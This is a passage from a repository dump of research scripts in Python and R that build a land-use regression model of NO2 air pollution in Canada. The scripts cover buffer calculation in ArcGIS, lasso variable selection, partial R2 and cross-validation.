[**downloadEnvRasters_Canada_LUR.py**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/downloadEnvRasters_Canada_LUR.py) - download NDVI, precipitation, and temperature rasters from Google Earth Engine. \n2. [**calcEnvBuffers_Canada_LUR.py**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/calcEnvBuffers_Canada_LUR.py) - calculate buffer variables for air monitor station locations. \n3. [**bufferFunctions_Canada_LUR.py**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/bufferFunctions_Canada_LUR.py) - helper functions for script 2.\n4. [**constantValues_Canada_LUR.py**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/constantValues_Canada_LUR.py) - constant values for script 2.\n5. [**threeYearAverages_Canada_LUR.ipynb**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/threeYearAverages_Canada_LUR.ipynb) - calculate three year averages for NDVI and air monitor NO2 datasets. Merge land use and air monitor datasets.\n6. [**sumRoadBuffers_Canada_LUR.ipynb**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/sumRoadBuffers_Canada_LUR.ipynb) - sum road buffer variables to create combined road variables (e.g. highways and expressways).\n7. [**modelSelection_Canada_LUR.R**](https://github.com/larkinandy/Canada_NO2_LUR_14_16/blob/master/Processing%20Scripts/modelSelection_Canada_LUR.R) - select env variables and create the LUR NO2 model.\n" }, { "alpha_fraction": 0.6189054846763611, "alphanum_fraction": 0.6616915464401245, "avg_line_length": 32.516666412353516, "blob_id": "3356dd0c9fda129f075720a14e7433cdf63de3df", "content_id": "6e756be5ad4589d3aad582ebbd451773851aabe5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2010, "license_type": "permissive", "max_line_length": 95, "num_lines": 60, "path": "/Processing Scripts/constantValues_Canada_LUR.py", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "############## define settings and variables #########\nKEYWORD = \"Partition\"\nZONE_KEYWORD = 'z'\nPARTITION_KEYWORD = \"i\"\nRASTER_TYPE = 0\nPOLYLINE_TYPE = 1\nPOINT_TYPE = 3\nPARALLEL_PROCESSING = 2\nPOINT_BUFFER_TYPE = 4\nBUFFER_EXTENSION = \"/buffers/\"\nAIRMONITOR_ID = \"FID\"\nTABLE_ID = \"ORIG_FID\"\nBUFFER_ID = \"FID_buffer\"\nLENGTH_COMMAND = \"!shape.length@kilometers!\" # command for field calculator operation\nCARBON_COMMAND = \"!SUM_carbon! 
* 1\"\nTEMP_STATS_WORKSPACE = \"tempStats\"\nRATER_PROCESS_WAIT_TIME = 60\nTEST_PROGRESS_FILE = \"test_progress.txt\"\n\nPARENT_FOLDER = \"C:/users/larkinan/desktop/CanadaLUR/\"#\"S:/Restricted/PURE_AIR/Canada_LUR_NO2/\"\nINPUT_FOLDER = PARENT_FOLDER + \"screenedMax/\"\nMONITOR_FILE= \"AirMonitors_Screened_Albers.shp\"\nRESULTS_FOLDER = PARENT_FOLDER + \"Results/\"\n\n#MONITOR_FILE = \"zone5.shp\"\n#INPUT_FOLDER =\"C:/users/larkinan/desktop/Global_LUR_processing/pyInput/\"\n#RESULTS_FOLDER = \"C:/users/larkinan/desktop/Global_LUR_processing/pyResults/\"\nMOSAIC_RASTER_LIST = []\nPOLLYLINE_MOSAIC_LIST = []\n\n#POLYLINE_LIST = [\"RailAndTransitLine_Albers.shp\",\n# \"aRDS_C123_Albers.shp\", \n# \"bRDS_expressways_Albers.shp\",\n# \"cRDS_highways_Albers.shp\",\n# \"dRDS_Local_Albers.shp\",\n# \"eRDS_Major_Albers.shp\",\n# \"fRDS_Truck_Restrictions_Albers.shp\"]\n\n\n#POLYLINE_LIST = [\"aLU_Industriall_Albsers_Dissolve.shp\",\n# \"bLU_Open_Parksl_Albsers_Dissolve.shp\",\n# \"cLU_Residential_Albsers_Dissolve.shp\"]\nPOLYLINE_LIST = []\n\n\n \nPOINT_BUFFER_LIST = []\nPOINT_MOSAIC_LIST = []\nPOINT_LIST = [] #TODO include NO2 satellite raster?\nRASTER_LIST = [\"N6.tif\",\"water_body5.tif\"]\n\nZONE_DEFINITIONS = \"zoneDef.shp\"\n#POLYLINE_LIST = []\n#COAST_BOUNDARY = \"coastline.shp\"\n#BUFFER_DISTANCE =[2000,200]\nBUFFER_DISTANCE = [50,100,250,500,750,1000,2000,3000,4000,5000,10000,15000,20000]\n#BUFFER_DISTANCE = [100,1000,10000]\nPARTITION_SIZE = 50\n\n####### end of define settings and variables #########" }, { "alpha_fraction": 0.6421709060668945, "alphanum_fraction": 0.6773303151130676, "avg_line_length": 31.614999771118164, "blob_id": "beba33ced0a7d582737868d324f923cd8bd16379", "content_id": "f526ed39f75df0896a855ab28e1ff7b848e071c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "R", "length_bytes": 19568, "license_type": "permissive", "max_line_length": 186, "num_lines": 600, "path": "/Processing Scripts/modelSelection_Canada_LUR.R", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "############ model_selection.R ############\n# Author: Andrew Larkin\n# Developed for Perry Hystad, Oregon State University\n# Date created: September 18, 2018\n# This script performs lasso varaible selection and incremental varaible buffer reduction for the NO2 LUR model.\n# RMSE, AME, R2, Adj. R2, MB, and MAB are calculated for the final model. The model coefficients, and minimum \n# p-value and percent variance explained for each variable and each region are also calculated.\n\n####### load required packages #########\nlibrary(glmnet) # lasso regression\n\n######################## helper functions #####################\n\n\n\n# create a matrix in which the sign of protective variables \"tr, ND, wa, us, and oe\" are flipped. 
\n# flipping the sign of protective variables allows the lasso regression to restrict coefficients to \n# positive coefficients only: that is, a positive coefficient of an inverted protective value is \n# equivalent to a negative value before the sign of the variable was flipped\n# INPUTS:\n# inData (dataframe) - matrix containing dataset \n# OuTPUTS:\n# inData (dataframe) - same matrix as input data, but with the signs of the protective\n# variables flipped\nposCoeffMatrix <- function(inData) {\n tempNames <- names(inData)\n endLength <- length(tempNames)\n switchList <- c(\"bL\",\"ND\",\"wa\",\"pr\",\"port_dist\") # list of two characters that indicate protective variables\n # for each variable in the dataset, check if the variable is in the list of protective variables.\n # if the variable is protective, multiply the value by 1\n for(i in 1:endLength) {\n predType <- substr(tempNames[i],1,2)\n \n if(predType %in% switchList) {\n inData[,i] <- inData[,i]*-1\n } \n }\n return(inData)\n \n} # end of posCoefMatrix\n\n\n\n# create a multipanel image in ggplot2. thanks to [email protected] for providing this function.\n# function was downloaded from http://www.cookbook-r.com/Graphs/Multiple_graphs_on_one_page_(ggplot2)/\nmultiplot <- function(..., plotlist=NULL, file, cols=1, layout=NULL, save) {\n library(grid)\n \n # Make a list from the ... arguments and plotlist\n plots <- c(list(...), plotlist)\n \n numPlots = length(plots)\n \n # If layout is NULL, then use 'cols' to determine layout\n if (is.null(layout)) {\n # Make the panel\n # ncol: Number of columns of plots\n # nrow: Number of rows needed, calculated from # of cols\n layout <- matrix(seq(1, cols * ceiling(numPlots/cols)),\n ncol = cols, nrow = ceiling(numPlots/cols))\n }\n if(save!=FALSE) {\n ppi <- 300\n png(save, width=10*ppi, height=12*ppi,res=ppi)\n }\n if (numPlots==1) {\n print(plots[[1]])\n \n } else {\n # Set up the page\n grid.newpage()\n pushViewport(viewport(layout = grid.layout(nrow(layout), ncol(layout))))\n \n # Make each plot, in the correct location\n for (i in 1:numPlots) {\n # Get the i,j matrix positions of the regions that contain this subplot\n matchidx <- as.data.frame(which(layout == i, arr.ind = TRUE))\n print(plots[[i]], vp = viewport(layout.pos.row = matchidx$row,\n layout.pos.col = matchidx$col))\n }\n }\n \n if(save!=FALSE) {\n dev.off()\n }\n} # end of multiplot\n\n\n\n\n# identify the buffer sizes included in the variales in the input dataset. 
This is done\n# by removing the first two characters from each variable and converting the remaining \n# characters from characters to an integer value\n# INPUTS:\n# inputData (dataframe) - matrix containing variables with buffer distances of interest \n# OuTPUTS:\n# buffDist (integer array) - array containing buffer distances, in ascending order\ngetBuffDistVec <- function(inputData) {\n buffDist <- rep(100,length(inputData)) # array that will contain output data\n # for each variable, extract the buffer distance from the variable name and conver to an\n # integer\n for(j in 1:length(inputData)) { \n endP <- nchar(inputData[j]) -1 \n buffDist[j] <- as.numeric(substr(inputData[j],3,endP))\n } \n buffDist <- buffDist[order(buffDist)] #order buffer distances in ascending order\n return(buffDist)\n} # end of getBuffDistVec\n\n\n\n# reduce buffers to only those that are more than x fold distance apart from one another\n# INPUTS:\n# inputData (dataframe) - matrix containing variables with buffer distances of interest \n# OuTPUTS:\n# buffDist (integer array) - array containing buffer distances, in ascending order\nreduceBuffList <- function(inputData,fold=3) {\n index = 1\n while(index<length(inputData)) {\n finishedVarCompare = FALSE\n while(finishedVarCompare == FALSE & index <length(inputData)) {\n if(inputData[index+1]/inputData[index] <= fold) {\n inputData <- inputData[-(index+1)]\n }\n else {\n finishedVarCompare=TRUE\n }\n }\n index = index +1\n }\n return(inputData)\n} \n\n\n\n# reduce incremental variables within x fold values of the smallest vriable size\n# INPUTS:\n# inCoef (float array) \n# OuTPUTS:\n# buffDist (integer array) - array containing buffer distances, in ascending order\nreduceLassoModel <- function(inCoef,inPred,fold=5) {\n \n # create a vector of the first two characters for all variables\n bufferTypes <- c(\"aL\",\"bL\",\"bR\",\"cL\",\"cR\",\"dR\",\"eR\",\"fR\",\"wa\",\"NDVI_14_16_\") \n \n a <- which(inCoef > 0) # identify which variables were selected by lasso regression\n b <- a[2:length(a)]-1 # remove the intercept from the model \n subNames <- names(inPred)[b] # get the names of the variables selected by lasso regression\n finalList <- c()\n index <- 0\n \n # for each type of varaible, remove variables that are within 3 fold of a smaller variable\n for(index in 1:length(bufferTypes)) {\n tempData <- subNames[substr(subNames,1,2) %in% bufferTypes[index]] \n \n # get the the distances for all buffers of the selected variable type\n if(length(tempData)>0) {\n cat(tempData)\n buffList <- getBuffDistVec(tempData)\n cat(buffList)\n reduced <- reduceBuffList(buffList,fold)\n m <- \"m\"\n reduced <- paste(bufferTypes[index],reduced,m,sep=\"\")\n finalList <- c(finalList,reduced)\n }\n }\n \n otherVars <- subNames[substr(subNames,1,2) %in% bufferTypes == FALSE]\n finalList <- c(finalList,otherVars)\n return(finalList)\n} # end of reduceLassoMode\n\n\n\n\n\n# calculate the IQR for all variables in a matrix\n# INPUTS:\n# inMatrix (dataframe) - variables for which IQR should be calculated\n# OUTPUTS:\n# IQRVals (float array) - array of IQR values, in the same order as the \n# variables in inMatrix\ncalcIQR <- function(inMatrix) {\n IQRVals <- rep(0,length(inMatrix[1,]))\n for(i in 1:length(inMatrix[1,])) {\n IQRVals[i] <- IQR(inMatrix[,i])\n }\n return(IQRVals)\n} # end of calcIQR\n\n\n\n# remove variables that don't have enough measurements greater than 0 in the input dataset\n# INPUTS:\n# inData (dataframe) - dataset containing predictor variables\n# minNumObs (int) - 
minimum number of observations that a dataset must contain\n# OUTPUTS:\n# drops (string array) - names of the variables that don't have minNumObs number of observations in \n# inData\nrestrictBuffsByNumObs <-function(inData,minNumObs) \n{\n attach(inData)\n vars <- names(inData)\n for(i in 1:length(vars)) \n {\n currVar <- get(vars[i])\n nObs <- length(inData[currVar>0,1])\n if(minNumObs > nObs) \n {\n drops <- c(drops,vars[i])\n }\n }\n detach(inData)\n return(drops)\n}\n\n\n\ncalcPercentGreaterThan0 <-function(inData,minNumObs) \n{\n attach(inData)\n vars <- names(inData)\n totalObs <- length(inData[,1])\n percentObs <- rep(0,length(vars))\n for(i in 1:length(vars)) \n {\n currVar <- get(vars[i])\n nObs <- length(inData[currVar>0,1])\n percentObs[i] <- nObs/totalObs\n }\n detach(inData)\n return(percentObs)\n}\n\n\nsubsetRoads <- function(inData,keepsat = TRUE) {\n roadsLabel <- c(\"bR\",\"cR\",\"dR\",\"eR\",\"fR\",\"alRds\")\n keeps <- c()\n bufferDists <- c(50,100,250,500,750,1000,2000,3000,4000,5000,10000,15000,20000)\n for(i in 1:length(roadsLabel))\n {\n for(j in 1:length(bufferDists)) \n {\n varName <- paste(roadsLabel[i],as.character(bufferDists[j]),\"m\", sep=\"\")\n keeps <- c(keeps, varName)\n }\n \n }\n if(keepsat) keeps <- c(keeps,\"sat_10_12\")\n returnData <- inData[ , (names(inData) %in% keeps)]\n return(returnData)\n}\n\nsubsetBuiltEnv <- function(inData,keepProtectors = TRUE,keepsat = TRUE)\n{\n builtEnvLabel <- c(\"aL\",\"bL\",\"cL\")\n if(keepProtectors) builtEnvLabel <- c(builtEnvLabel,\"wa\",\"NDVI_14_16_\")\n keeps <- c()\n bufferDists <- c(50,100,250,500,750,1000,2000,3000,4000,5000,10000,15000,20000)\n for(i in 1:length(builtEnvLabel))\n {\n for(j in 1:length(bufferDists)) \n {\n varName <- paste(builtEnvLabel[i],as.character(bufferDists[j]),\"m\", sep=\"\")\n keeps <- c(keeps, varName)\n }\n }\n if(keepsat) keeps <- c(keeps,\"sat_10_12\")\n returnData <- inData[ , (names(inData) %in% keeps)]\n return(returnData)\n}\n\ndropNDVI <- function(inData)\n{\n dropLabel <- c(\"NDVI_14_16_\")\n drops <- c()\n bufferDists <- c(500,750,1000,2000,3000,4000,5000,10000,15000,20000)\n for(i in 1:length(dropLabel))\n {\n for(j in 1:length(bufferDists)) \n {\n varName <- paste(dropLabel[i],as.character(bufferDists[j]),\"m\", sep=\"\")\n drops <- c(drops, varName)\n }\n }\n returnData <- inData[ , !(names(inData) %in% drops)]\n return(returnData)\n}\n\n\n\ncreateLassoModel <- function(inData) \n{\n \n tempMat <- as.matrix(posCoeffMatrix(inData)) # reverse direction of protective variabless\n cvfit <- glmnet::cv.glmnet(tempMat,NO2_vals,type.measure = \"mse\",standardize=TRUE,alpha = 1,lower.limit=0) # perform lasso regression\n coefRaw <- coef(cvfit, s = \"lambda.1se\")\n keeps <- reduceLassoModel(coefRaw,inData,3)\n \n return(keeps)\n}\n\n\n\n\n# calculate and graph the partial R2 values for all variables and continental regions.\n# INPUTS:\n# inData (dataframe) - data matrix containing predictor variables\n# inMonitor (float array) - array containing monitor measurements\ncalcPartialR2 <- function(inData, inMonitor) {\n \n tempMat <- as.matrix(inData)\n tempMonitor <- inMonitor\n partialR2 <- rep(0,length(inData))\n lmTotal <- lm(tempMonitor~tempMat)\n \n \n # claculate partial R2 for all variables in the dataset\n ssrTot <- sum(anova(lmTotal)$\"Sum Sq\"[1:2])\n sseTot <- anova(lmTotal)$\"Sum Sq\"[2]\n for(i in 1:length(inData)) {\n tempRemove <- names(inData)[i]\n tempData <- tempMat[ , !names(inData) %in% tempRemove]\n tempLm <- lm(tempMonitor~tempData)\n tempSSR <- 
anova(tempLm)$\"Sum Sq\"[1]\n tempSSE <- anova(tempLm)$\"Sum Sq\"[2]\n partialR2[i] <- (tempSSE - sseTot)/tempSSE\n }\n \n valMat <- round(partialR2*100,2)\n \n \n return(valMat)\n \n} # end of graphPartialR2\n\n\n\n\n\n# using an input dataset, randomly partition a training and testing dataset for cross-validation\n# INPUTS:\n# inData (dataframe) - input dataset with predictor variables and air monitor measurements\n# sampProp (float) - value ranging from 0 to 1, indicating the proportion of data that should be partitioned to the training dataset\n# zoneVals (int vector) - indicates which zone the corresponding row of the input dataset belongs to\n# OutPUTS:\n# returnData (dataframe) - input dataset with an indicator variable of whether each row belongs to the train or test partition\ncreateTrainAndTest <- function(inData,sampProp) {\n \n smp_size <- floor(sampProp* nrow(inData)) # calculate the sample size for the training dataset\n cat(smp_size)\n train_ind <- sample(seq_len(nrow(inData)), size = smp_size) # randomly sample the entire dataset to make the training dataset\n train <- inData[train_ind, ]\n test <- inData[-train_ind, ]\n \n \n # create an indicator variable for whether a given sample (row in the dataset is a train or test point)\n train$ind <- rep(0,nrow(train))\n test$ind <- rep(1,nrow(test))\n \n returnData <- rbind(train,test) # combine the train and test dataset and return the result\n return(returnData)\n} # end of createTrainAndTest\n\n\n\n\n\n\n# perform leave 10% out cross-validation numRep number of times. Return the root mean square, mean abs square, r-square,\n# adjusted r-square, bias, and abs bias\n# INPUTS:\n# inData (dataframe) - input data frame containing both the predictor and air monitor variables\n# numReps (int) - number of cross-validation repititions to perform\n# OUTPUTS:\n# returnData (dataframe) - summary statistics of the cross-validation, for each region\ncrossValidation <- function(inPredictors,inMonitors,numReps,percTrain =0.8) {\n \n rmse <- ase <- rsq <- adjRsq <- bias <- absBias <- 0\n \n inPredictors$monitor <- inMonitors\n combinedData <- inPredictors\n \n p <- 1\n \n \n # for each cross-validation repitition\n for(i in 1:numReps) {\n cat(i) # print the repitition number to the screen\n cat(\"\\n\")\n \n trainInd <- createTrainAndTest(combinedData,percTrain) # create training and testing datasets\n \n # partition trainInd into training and test datasets based on the indicator variable ind ( 0 = 1, 1 = test)\n monitor <- trainInd$monitor \n trainInd <- trainInd[ , !(names(trainInd) %in% c(\"monitor\"))]\n trainSet <- subset(trainInd,ind == 0)\n trainMonitor <- subset(monitor,trainInd$ind == 0)\n testSet <- subset(trainInd,trainInd$ind == 1)\n testMonitor <- subset(monitor,trainInd$ind == 1)\n drops <- c(\"ind\",\"monitor\")\n trainSet <- trainSet[ , !(names(testSet) %in% drops)]\n testSet <- testSet[ , !(names(testSet) %in% drops)]\n \n lmModel <- lm(trainMonitor ~ aL2000m + NDVI_14_16_250m + sqTemp + logSat + sqAr + sqRa + sqPop + NDVI_14_16_250m + logSat + sqTemp\n , data = trainSet)\n coefRaw <- lmModel$coefficients\n \n testMat <- cbind(rep(1,nrow(testSet)),testSet)\n \n # create predictions for the test dataset based on the variables selected by the training dataset\n #pred <- as.vector(coefRaw[1:length(coefRaw)]%*%t(testMat))\n pred <- predict(lmModel,testSet)\n residuals <- testMonitor-pred\n n <- length(testMonitor)\n \n \n # calculate summary statistics \n ase <- ase + mean(abs(residuals))\n sumSqErr <- sum(residuals^2)\n sumTot <- 
sum((testMonitor - mean(testMonitor))^2)\n rsq <- 1 - (sumSqErr/sumTot)\n rmse <- rmse + sqrt(mean(residuals^2))\n adjRsq <- adjRsq + 1 - (((1-rsq)*(n-1))/(n-p-1))\n absBias <- absBias + (100/length(residuals))*(sum(abs(residuals)/testMonitor))\n bias <- bias + (-100/length(residuals))*(sum(residuals/testMonitor))\n \n \n }\n \n ase <- ase/numReps\n rmse <- rmse/numReps\n absBias <- absBias/numReps\n bias <- bias/numReps\n adjRsq <- adjRsq/numReps\n \n returnData <- data.frame(rmse,ase,adjRsq,bias,absBias) # combine evaluation statistics into a dataframe to return as output\n return(returnData)\n \n} # end of crossValidation\n\n\n\n\n# create predictions for the test dataset based on the variables selected by the training dataset\n#pred <- as.vector(coefRaw[1:length(coefRaw)]%*%t(testMat))\npred <- predict(lmModel,candidateModel)\nresiduals <- NO2_vals-pred\nn <- length(NO2_vals)\n\n# calculate summary statistics \nase <- mean(abs(residuals))\nsumSqErr <- sum(residuals^2)\nsumTot <- sum((NO2_vals - mean(NO2_vals))^2)\nrsq <- 1 - (sumSqErr/sumTot)\nmse <- sqrt(mean(residuals^2))\nn <- length(residuals)\np <- 1\nadjRsq <- 1 - (((1-rsq)*(n-1))/(n-p-1))\nabsBias <- (100/length(residuals))*(sum(abs(residuals)/NO2_vals))\nbias <- (-100/length(residuals))*(sum(residuals/NO2_vals))\n\n\n\n\n\n################# main script #################\n\nlibrary(ggplot2)\nlibrary(glmnet)\n\n#setwd(\"C:/users/larkinan/documents/Canada_NO2_LUR_14_16/Datasets\")\nsetwd(\"C:/users/larkinan/documents/Canada_NO2_LUR_14_16/Datasets\")\n\n\nrawData <- read.csv(\"Canada_LUR_preprocessed_Sep17_18_v2.csv\")\n\n\n\n# setup data for processing\nscreenedData <- subset(rawData,elevation >-1)\nNO2_vals <- screenedData$meanNO2_2014_2016\ndrops <- c(\"meanNO2_2014_2016\",\"NAPS.ID\",\"percent.completeness_2013\",\"percent.completeness_2014\",\"percent.completeness_2015\",\n \"percent.completeness_2016\",\"mean_2013\",\"mean_2014\",\"mean_2015\",\"mean_2016\", \"numObs\", \"medYr\", \"minNO2\", \"meanNO2\", \"maxNO2\", \"stdDevNO2\", \"numMeas\",\"FID\",\"NAME\",\"CONTINENT\")\ndrops <- c(drops,\"pr_14_16\")\ndrops <- restrictBuffsByNumObs(screenedData,10)\nexactMatrix <- screenedData[ , !(names(screenedData) %in% drops)]\nexactMatrix <- dropNDVI(exactMatrix)\nexactMatrix$logTemp <- log(exactMatrix$te_14_16+3)\nexactMatrix$sqTemp <- (exactMatrix$te+3)^2\nexactMatrix$logSat <- log(exactMatrix$sat_10_12)\nexactMatrix$sqAr <- sqrt(exactMatrix$aR250m)\nexactMatrix$sqRa <- sqrt(exactMatrix$Ra750m)\nexactMatrix$sqPop <- sqrt(exactMatrix$PD20000)\n\ntempMat <- as.matrix(posCoeffMatrix(exactMatrix)) # reverse direction of protective variabless\ncvfit <- glmnet::cv.glmnet(tempMat,NO2_vals,type.measure = \"mse\",standardize=TRUE,alpha = 1,lower.limit=0) # perform lasso regression\ncoefRaw <- coef(cvfit, s = \"lambda.1se\")\nkeeps <- reduceLassoModel(coefRaw,exactMatrix,3)\n\n\ncreateLassoModel(exactMatrix)\n\n\n\n\nkeeps <- c(\"aL2000m\", \"sqRa\",\"sqAr\",\"logSat\",\"sqPop\",\"sqTemp\",\"NDVI_14_16_250m\")\ncandidateModel <- exactMatrix[ , (names(exactMatrix) %in% keeps)]\ncalcPartialR2(candidateModel,NO2_vals)\n\nlmModel <- lm(NO2_vals~ as.matrix(candidateModel))\npredSub <- lmModel$fitted.values\n\n\n\n\ncrossValidation(candidateModel,NO2_vals,10000,0.8)\n\n\n\n\n\n\n\n\n################## SUPPLEMENTAL SENSITIVITy ANALYSES ##############\n\n\n\n\n\n\n\n############### test for sensitivity to percent monitor requirement ############\n\n\n# at least 10 % of monitors have a value greater than 0\nsummary(lm(NO2_vals ~ aL2000m + aR250m + 
te_14_16 + pr_14_16 + sat_10_12 + PD20000 + NDVI_14_16_250m \n , data = exactMatrix))\n\n\n# at least 25% of monitors have a value greater than 0\nsummary(lm(NO2_vals ~ aL2000m + Ra500m + te_14_16 +pr_14_16+ sat_10_12 + PD20000 + NDVI_14_16_250m \n , data = exactMatrix))\n\n\n# at least 50% of monitors have a value greater than 0\nsummary(lm(NO2_vals ~ aL2000m + aR1000m + te_14_16 + pr_14_16 +\n sat_10_12 + PD20000 + NDVI_14_16_250m,data=exactMatrix))\n\n\n\n############### create models restricted to specific land use classes ###############\n\n\n########### roads models ##############\n\n# without satellite \nroadsData <- subsetRoads(exactMatrix,FALSE)\ncreateLassoModel(roadsData)\nlinear_model <- lm(NO2_vals ~ eR2000m + dR15000m + alRds1000m, data = exactMatrix)\n\n# with satellite \nroadsData <- subsetRoads(exactMatrix)\ncreateLassoModel(roadsData)\nlinear_model <- lm(NO2_vals ~ eR2000m + sat_10_12 + dR15000m + alRds1000m, data = exactMatrix)\n\n\n############ meteorological models ###########\n\n# without satellite #\nlinear_model <- lm(NO2_vals ~ pr_14_16 + te_14_16, data = exactMatrix)\n\n# with satellite #\nlinear_model <- lm(NO2_vals ~ pr_14_16 + te_14_16 + sat_10_12, data = exactMatrix)\n\n\n\n############# built env models ##############\n\nbuiltEnvData <- subsetBuiltEnv(exactMatrix)\n\n# with protective variables and satellite\ncreateLassoModel(builtEnvData,FALSE)\nbuiltEnvData <- subsetBuiltEnv(exactMatrix,FALSE,TRUE)\nlinear_model <- lm(NO2_vals ~ aL2000m + aL15000m + cL5000m + sat_10_12 + NDVI_14_16_250m + NDVI_14_16_2000m + NDVI_14_16_10000m, data = exactMatrix)\nbuiltEnvData <- subsetBuiltEnv(exactMatrix,FALSE)\n\n# with satellite but not protective variables\ncreateLassoModel(builtEnvData)\nlinear_model <- lm(NO2_vals ~ aL2000m + aL10000m + cL5000m + sat_10_12, data = exactMatrix)\n\n# no satellite or protective variables \nbuiltEnvData <- subsetBuiltEnv(exactMatrix,FALSE,FALSE)\ncreateLassoModel(builtEnvData)\nlinear_model <- lm(NO2_vals ~ aL2000m + aL15000m + cL5000m , data = exactMatrix)\n\n\n\n########### end of ModelSelection.R ##########" }, { "alpha_fraction": 0.6153075695037842, "alphanum_fraction": 0.6209585070610046, "avg_line_length": 53.609375, "blob_id": "8a92fd946d264ddbd7559415779fc70c8dddc0ae", "content_id": "87d6438691602bd70055ab5f548173c7d02f5348", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13980, "license_type": "permissive", "max_line_length": 181, "num_lines": 256, "path": "/Processing Scripts/calcEnvBuffers_Canada_LUR.py", "repo_name": "larkinandy/Canada_NO2_LUR_14_16", "src_encoding": "UTF-8", "text": "\n################# runScripts.py ##################\n#\n# Contains functions for automating several ArcGIS functions during the development of a Land Use Regression model.\n# Functions include generating a series of buffers around points in a shapefile, determining polyline length within each unique buffer,\n# and determining arverage raster values within the buffer.\n#\n# Author: Andrew Larkin\n# Created for: Perry Hystad, Oregon State University\n# Last modified: 12/08/2014\n#\n# Requirements:\n# ArcGIS with spatial extension (tested on ArcGIS v. 10.2)\n# ArcGIS comptabile version of python (tested with Python v. 
2.7)\n# Python integrated development environment is highly recommended but not required\n# StatisticsForOverlappingZones.py script (provided by NOAA) is required for the batchRasterBufferIntersect function\n# BufferVariables.py contains many custom functions called by runScripts.py\n# constantValues.py conatins all modifiable input values (e.g. input files, folder locations)\n\n############## import required modules ###############\nimport os\nimport BufferVariables\nimport multiprocessing\nimport arcpy\nimport constantValues as values\nimport gc\narcpy.env.overwriteOutput = True\nimport shutil\nimport time\nimport constantValues\n############## end of module import ##################\n\n\n\n########### helper functions ################\n\n# create all of the buffer zones for all of the air monitor partitions \ndef makeBufferZones(airMonitorPartitions):\n pool = multiprocessing.Pool()\n pool.map(BufferVariables.makeMultipleBuffers, airMonitorPartitions) # run make buffer zones on parallel processes\n pool.close()\n pool.join() \n print (\"completed making buffer zones for all partitions\")\n del pool\n### end of makeBufferZones ###\n\ndef determineRasterList(airMonitor, rasterValues):\n for fileName in values.RASTER_LIST:\n rasterValues.append(fileName)\n if(len(values.MOSAIC_RASTER_LIST) > 0):\n for variable in values.MOSAIC_RASTER_LIST:\n zone = BufferVariables.determineAirMonitorZone(airMonitor)\n mosaicFilename = BufferVariables.determineMosaicFile(variable,zone,values.RASTER_TYPE)\n # print(mosaicFilename) \n rasterValues.append(mosaicFilename) \n # print(rasterValues)\n\ndef determinePolylineList(airMonitor, polyLineValues):\n for fileName in values.POLYLINE_LIST:\n polyLineValues.append(fileName)\n if(len(values.POLLYLINE_MOSAIC_LIST) > 0):\n for variable in values.POLLYLINE_MOSAIC_LIST:\n zone = BufferVariables.determineAirMonitorZone(airMonitor)\n mosaicFilename = BufferVariables.determineMosaicFile(variable,zone,values.POLYLINE_TYPE)\n #print(mosaicFilename)\n polyLineValues.append(mosaicFilename) \n #print(polyLineValues)\n\ndef determinePointBufferList(airMonitor, pointBufferList):\n for fileName in values.POINT_BUFFER_LIST:\n pointBufferList.append(fileName)\n \n\ndef determinePointList(airMonitor, pointList):\n for file in values.POINT_LIST:\n pointList.append(file)\n if(len(values.POINT_MOSAIC_LIST) > 0):\n for variable in values.POINT_MOSAIC_LIST:\n zone = BufferVariables.determineAirMonitorZone(airMonitor)\n mosaicFilename = BufferVariables.determineMosaicFile(variable,zone,values.POINT_TYPE)\n pointList.append(mosaicFilename)\n\n# setup and calculate average values for a buffer zone\ndef processBufferVariables(partitionFolderOut, masterBufferFile, identifier, buffer, airMonitor,variableType, fileList):\n readyToJoin = False\n continueVar = True\n while (continueVar):\n try:\n argumentList = []\n argumentList2 = []\n argumentList3 = []\n argVars = []\n if(variableType == values.PARALLEL_PROCESSING):\n rasterList = fileList[0]\n polylineList = fileList[1] \n if(len(fileList)>0):\n print(\"the polylineList is \" + str(len(polylineList)))\n pool = multiprocessing.Pool(len(polylineList))\n if(len(polylineList) >0):\n argumentList = []\n argumentList = BufferVariables.createArgumentList(polylineList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor) \n #pool = multiprocessing.Pool(len(polylineList))\n result = pool.map(BufferVariables.multi_run_polyline_wrapper,argumentList2) # calculate average polyline values on parallel processors\n pool.close()\n 
pool.join()\n readyToJoin = BufferVariables.testFileCompletion(argumentList) \n #BufferVariables.testProgress(result)\n #readyToJoin = BufferVariables.testFileCompletion(argumentList2) \n elif(variableType == values.RASTER_TYPE): # if the variable files are from rasters, run the raster wrapper function\n if(len(fileList)>0):\n pool = multiprocessing.Pool(processes=2)\n #pool = multiprocessing.Pool(len(fileList))\n argumentList = BufferVariables.createArgumentList(fileList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor) \n \n result = pool.map_async(BufferVariables.multi_run_raster_wrapper,argumentList) # calculate average raster values on parellel processors\n #time.sleep(60)\n BufferVariables.testProgress(result)\n readyToJoin = BufferVariables.testFileCompletion(argumentList)\n elif(variableType == values.POLYLINE_TYPE): # if the variable files are from polyline shp files, ru nthe polyline wrapper function \n if(len(fileList)>0):\n pool = multiprocessing.Pool(len(fileList))\n argumentList2 = BufferVariables.createArgumentList(fileList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor) \n result = pool.map(BufferVariables.multi_run_polyline_wrapper,argumentList2) # calculate average polyline values on parallel processors\n pool.close()\n pool.join() \n readyToJoin=True\n elif(variableType==values.POINT_BUFFER_TYPE):\n if(len(fileList)>0):\n argumentList3 = BufferVariables.createArgumentList(fileList, partitionFolderOut, masterBufferFile,identifier,buffer,airMonitor)\n BufferVariables.pointBufferIntersect(argumentList3[0][0], argumentList3[0][1],argumentList3[0][2], argumentList3[0][3], 